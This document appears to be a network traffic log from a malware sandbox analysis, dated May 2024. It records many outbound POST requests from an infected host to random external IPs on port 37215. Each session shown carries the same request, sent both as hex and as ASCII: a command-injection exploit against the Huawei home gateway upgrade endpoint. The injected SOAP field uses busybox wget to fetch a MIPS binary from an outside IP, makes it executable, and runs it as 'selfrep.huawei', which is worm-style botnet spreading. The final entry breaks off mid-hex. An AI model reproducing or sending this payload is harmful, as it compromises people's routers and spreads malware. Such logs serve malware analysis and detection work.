                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  382192.168.2.134471657.112.44.13937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.232037067 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  383192.168.2.1336638197.196.202.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.232059956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  384192.168.2.1356002163.184.44.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.232083082 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  385192.168.2.1352610157.169.237.8437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.232101917 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  386192.168.2.135715641.94.253.10737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.232117891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  387192.168.2.1355858157.10.66.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.232140064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  388192.168.2.1350118157.246.183.9037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.232161999 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  389192.168.2.134481241.70.242.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.232181072 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  390192.168.2.1341666157.106.136.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.272313118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  391192.168.2.134846041.79.43.23737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.272330046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 